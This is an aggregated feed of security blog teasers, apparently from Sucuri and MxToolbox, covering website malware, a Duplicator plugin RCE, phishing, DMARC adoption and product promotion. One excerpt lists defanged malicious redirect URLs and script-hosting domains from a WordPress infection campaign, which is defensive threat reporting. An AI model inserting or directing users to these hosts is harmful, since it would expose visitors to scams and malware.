E-Commerce Security – Planning for Disasters

E-Commerce Security – Planning for DisastersThis is the last post in our series on E-commerce Security:

  • Intro to Securing an Online Store – Part 1
  • Intro to Securing an Online Store – Part 2

Today, let’s expand on some of the suggestions made during a webinar I hosted recently about steps you can take to secure your online store.

So far in this series, we have touched on how to identify potential risks and how to defend against threats via WAF technologies.

Continue reading E-Commerce Security – Planning for Disasters at Sucuri Blog.

Source: Scuri check

Backdoor Uses Paste Site to Host Payload

Backdoor Uses Paste Site to Host PayloadFinding backdoors is one of the biggest challenges of a website security analyst, as backdoors are designed to be hidden in case the malware is found and removed.

Website Backdoors

A backdoor is a piece of malware that attackers leave behind to allow them access back into a website. Hackers like to inject code into different locations to increase their chances of retaining control of the website so they can reinfect it continuously.

Continue reading Backdoor Uses Paste Site to Host Payload at Sucuri Blog.

Source: Scuri check

Outdated Duplicator Plugin RCE Abused

Outdated Duplicator Plugin RCE AbusedWe’re seeing an increase in the number of cases where attackers are disabling WordPress sites by removing or rewriting its wp-config.php file.

These cases are all linked to the same vulnerable software: WordPress Duplicator Plugin.

Versions lower than 1.2.42 of Snap Creek Duplicator plugin are vulnerable to a Remote Code Execution attack, where the malicious visitor is able to run any arbitrary code on the target site.

Continue reading Outdated Duplicator Plugin RCE Abused at Sucuri Blog.

Source: Scuri check

Unsuccessfully Defaced Websites

Unsuccessfully Defaced WebsitesDefaced websites are a type of hack that is easy to notice and a pain for website owners. Recently, we came across some defacement pages with a peculiar JavaScript injection included in the source code.

What is a Defacement?

Website defacement is a hack that often involves adding malicious images to the website homepage and other important pages. Beyond the initial embarrassment, the effects of defacement can include loss of traffic, revenue, and trust in your brand.

Continue reading Unsuccessfully Defaced Websites at Sucuri Blog.

Source: Scuri check

New Guide on How to Use the Sucuri WordPress Security Plugin

New Guide on How to Use the Sucuri WordPress Security PluginSucuri has always been active in the WordPress community. We’ve attended WordCamps around the world, created tools and features specifically for WordPress, and have maintained a free WordPress security plugin with over 400k installations.

If you don’t already have it, you can download the Sucuri Security – Auditing, Malware Scanner and Security Hardening plugin directly from the official WordPress repository.

Recently, we launched a guide on How to Use the WordPress Security Plugin.

Continue reading New Guide on How to Use the Sucuri WordPress Security Plugin at Sucuri Blog.

Source: Scuri check

PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program

PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management ProgramThis is the fourth post in a series of articles on understanding the Payment Card Industry Data Security Standard – PCI DSS. We want to show how PCI DSS can help anyone going through the compliance process using the PCI SAQ’s (Self Assessment Questionnaires). In the previous articles we have written about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.

Continue reading PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program at Sucuri Blog.

Source: Scuri check

WordPress Database Upgrade Phishing Campaign

WordPress Database Upgrade Phishing CampaignWe have recently been notified of phishing emails that target WordPress users. The content informs site owners that their database requires an update and looks like this:

The email’s appearance resembles that of a legitimate WordPress update message, however the content includes typos and uses an older messaging style. Another suspicious item in the content is the deadline. WordPress wouldn’t define deadlines without a valid explanation, and hosting providers wouldn’t either (if you believed the email was from them).

Continue reading WordPress Database Upgrade Phishing Campaign at Sucuri Blog.

Source: Scuri check

The State of DMARC – Fortune 500 vs Alexa 1000

DMARC adoption is accelerating. From the initial launch in 2012 by email inbox providers trying to protect their users to large companies looking to improve email delivery, DMARC has achieved worldwide adoption. However, new technology like DMARC goes through a cycle of adoption, and DMARC appears to be lagging among companies that would be typical targets for spoofing, spamming and hacks – Fortune 500 and Alexa 1000 domains.

Print

MxToolbox’s State of DMARC Adoption is a periodic evaluation of how inbox providers, businesses and government organizations are progressing in adopting DMARC to protect their inbound and outbound email.  As your expert in email deliverability, MxToolbox is committed to helping you protect your email so that your business can thrive.  DMARC adoption is paramount to improving your email deliverability.  Read more.

DMARC is the key to improving Email Deliverability!

Email is the key to your customer communication strategy.  But, what is your email reputation?

Setting up and managing your DMARC configuration is the key to getting insight into your email delivery.  MxToolbox is the key to understanding DMARC.

MxToolbox Delivery Center gives you:

  • Who is sending phishing email purporting to be from your domain
  • What is the reputation of your domains and delegated IPs
  • Where other senders are and What their reputations are
  • How your SPF, DKIM and DMARC setup is performing

Learn More

 

 

Source: MXtoolbox

How to Improve Your Website Security Posture – Part II

How to Improve Your Website Security Posture – Part IIIn the first post of this series, we discussed some of the main website security threats. Knowing the website security environment is a vital part of a good website posture. However, it is also important to be aware of what to do to strengthen your website.

Today, we are going to give you some practical tips on how to improve your website posture.

As a website owner, we highly recommend using the principle of least privilege. It is a computer science principle which can be applied to every level in a system and the benefits strengthen your website security posture.

Continue reading How to Improve Your Website Security Posture – Part II at Sucuri Blog.

Source: Scuri check

Core Integrity Verifications

Core Integrity VerificationsIn order to clean a malware infection, the first thing we need to know is which files have been compromised. At Sucuri, we use several techniques including whitelists, blacklists, and anomaly checks. In this blog post, we’re going to be focusing on how core integrity checks are a key component of the whitelisting model and how this is aids in effectively detecting malware.

Cryptographic Hash Functions and Checksums

When a website compromise happens, attackers add, modify, or delete files from the server.

Continue reading Core Integrity Verifications at Sucuri Blog.

Source: Scuri check

Threat Investigation in Delivery Center

Email delivery is under assault by spammers and hackers world-wide.  Your brand and domain name can be leveraged to send spoofing emails, malware and spam to your customers, your suppliers and even to random strangers.  Unfortunately, the potential for abuse is no longer restricted to larger companies as hackers and spammers attack smaller, less protected companies.  Regardless of the size of your business, you need to protect yourself.  Several small businesses using MxToolbox Delivery Center have recently discovered that as much as 90% of the email volume reportedly coming “From” their domain is spoofed, leading to blanket denial of their email delivery.  Any company can have their business completely crippled by this type of spoofing.  How do you investigate and prevent email spoofing to improve email deliverability and protect your business?

Introducing, MxToolbox Threat Investigator!

Screen Shot 2018-08-22 at 4.20.01 PM

Investigate threats to your email delivery in a consolidated interface.

Continuously striving to increase our customers’ email delivery rates, MxToolbox is excited to unveil a new product feature that will help your business achieve ideal deliverability.   With Threat Investigator, our customers get in-depth details on potential email delivery threats, including threatening IP addresses, geo-location, related domain information, reverse domain name system (DNS), autonomous system name/number (ASN), threat volume, and online reputation (MxReputation).  Threat Investigator provides everything you need to analyze current and potential email threats to email delivery and take steps to prevent these threats from impacting your business.

Screen Shot 2018-08-22 at 4.18.53 PM

Leverage ASN, Geo-location and Reverse DNS to categorize threats.

Because online communication is essential for your business, MxDelivery Center with the new Threat Investigator feature examines issues associated with outbound email, focusing on any encountered delivery difficulties. Moreover, this product identifies ongoing phishing and spoofing campaigns that threaten your brand and email reputation. Being able to recognize these threats early preserves your company name and helps overall message deliverability.

In addition, this innovative feature also provides phishing and legitimate email failure samples as references for investigation purposes. All of this is at your disposal for comparison exercises and to further enhance your familiarity with threats as they emerge.

Screen Shot 2018-08-22 at 4.32.50 PM

Threat Investigator integrates MxToolbox blacklist reputation to give you more insight.

MxToolbox’s Threat Investigator gives you unmatched awareness of threats to your company’s email practices. Your messages deserve safeguarding, and MxToolbox provides the tools necessary to protect and deliver your business email. Rely on our team of experts to help your emails get delivered by using the new Threat Investigator feature to reinforce your brand.

Existing customers: As a valued MxToolbox customer, you will have access to the Threat Investigator tool (depending on your current product subscription level). If you do not have access and would like to use this new feature, be sure to upgrade your plan to take advantage of MxToolbox’s Threat Investigator item.  Your business and your customers will greatly benefit from its addition.

Source: MXtoolbox

Fake Font Dropper

Fake Font DropperEvery day we see different website infections. When we receive unusual or interesting cases, our researcher instincts are triggered to investigate the unusual website behavior in order to understand how new infections work. In this case, the odd behavior was the website’s pop-up window claiming there was a missing font.

The Unwanted Popup Window

A website owner reached out to us to investigate the error displaying on their site. The popup window informed the visitors that they were unable to view the content of the site because their computers were missing a font called “HoeflerText”:

The malware tries to trick visitors into clicking the “Update” button to download a malicious file called: Font_Update.exe

Earlier this year, we wrote about a wave of WordPress infections involving malicious plugins that inject obfuscated scripts, creating unwanted pop-up/pop-unders which serve unwanted ads.

Continue reading Fake Font Dropper at Sucuri Blog.

Source: Scuri check

Massive WordPress Redirect Campaign Targets Vulnerable tagDiv Themes and Ultimate Member Plugins

Massive WordPress Redirect Campaign Targets Vulnerable tagDiv Themes and Ultimate Member PluginsThis August, we’ve seen a new massive wave of WordPress infections that redirect visitors to unwanted sites.

When redirected, users see annoying pages with random utroro[.]com addresses and fake reCAPTCHA images. The messages and content try to convince visitors to verify and subscribe to browser notifications without disclosing the purpose of this behavior.

Alternative redirect URLs include:

hxxp://murieh[.]space/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub

hxxps://unverf[.]com/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub
Injected Scripts

The injected malware involves a script from one of the following two sites: cdn.eeduelements[.]com and cdn.allyouwant[.]online.

Continue reading Massive WordPress Redirect Campaign Targets Vulnerable tagDiv Themes and Ultimate Member Plugins at Sucuri Blog.

Source: Scuri check

Fake Plugins with Popuplink.js Redirect to Scam Sites

Fake Plugins with Popuplink.js Redirect to Scam SitesSince July, we’ve been observing a massive WordPress infection that is responsible for unwanted redirects to scam and ad sites. This infection involves the tiny.cc URL shortener, a fake plugin that has been called either “index” or “wp_update”, and a malicious popuplink.js file.

Infected pages typically have these two scripts in the <head> section of the page.

Continue reading Fake Plugins with Popuplink.js Redirect to Scam Sites at Sucuri Blog.

Source: Scuri check

How to Improve Your Website Posture – Part I

How to Improve Your Website Posture – Part IHave you ever wondered if your website security posture is adequate enough?

The risk of having a website compromise is never going to be zero. However, as a webmaster, you can play an important role in minimizing the chances of a website hack. A good security posture entails how to understand the importance of securing a website and how to implement security measures.

Correcting a poor security posture means recognizing problems that you might not notice.

Continue reading How to Improve Your Website Posture – Part I at Sucuri Blog.

Source: Scuri check

How to Improve Website Resilience for DDoS Attacks – Part II – Caching

How to Improve Website Resilience for DDoS Attacks – Part II – CachingIn the first post of this series, we talked about the practices that will optimize your site and increase your website’s resilience to DDoS attacks. Today, we are going to focus on caching best practices that can reduce the chances of a DDoS attack bringing down your site.

Website caching is a technique to store content in a ready-to-go state without the need (or with less) code processing. When a CDN is in place, cache stores the content in a server location closer to the visitor.

Continue reading How to Improve Website Resilience for DDoS Attacks – Part II – Caching at Sucuri Blog.

Source: Scuri check

Cookie Consent Script Used to Distribute Malware

Cookie Consent Script Used to Distribute MalwareMost websites today use cookies. Since May 25th, 2018, all websites that do business in the European Union (EU) had to make some changes to be compliant with the EU General Data Protection Regulation (GDPR). Even though cookie usage is mentioned only once in GDPR, any organization utilizing them to track users’ browsing activity have had to add a warning about how they are using them and ask for the user consent.

Continue reading Cookie Consent Script Used to Distribute Malware at Sucuri Blog.

Source: Scuri check

Cryptominers: Binary-Process-Cron Variants and Methods of Removal

Cryptominers: Binary-Process-Cron Variants and Methods of RemovalThis post provides a brief overview of how to manually remove server-side cryptominers and other types of Binary-Process-Cron malware from a server. Unlike browser-based JavaScript cryptominers that have been injected into a web page, a binary server-level cryptominer abuses server resources without affecting the computers or mobile devices of site visitors.

We will cover the attributes of these sever-level infections to provide a basic understanding of their form and function, as well as a couple of different methods of removal.

Continue reading Cryptominers: Binary-Process-Cron Variants and Methods of Removal at Sucuri Blog.

Source: Scuri check

The State of DMARC Adoption – Inbox Providers in 2018

Print

There is a lot of buzz surrounding DMARC right now.  And most people have questions like:

  • How many companies are adopting DMARC?
  • What is the volume of email sent to companies and governments that have adopted DMARC?
  • Is it necessary for your business?

As your expert in Email Delivery, MxToolbox is constantly looking at technologies that affect your business.  For years, the biggest worry for companies like yours was being blacklisted. Now, email delivery is more complex and requires constant evaluation of your email senders and their compliance with new technologies like SPF, DKIM and DMARC.  In our State of DMARC Adoption, we evaluate how quickly companies are adopting DMARC and how DMARC can affect your business.  Learn More.

 

Source: MXtoolbox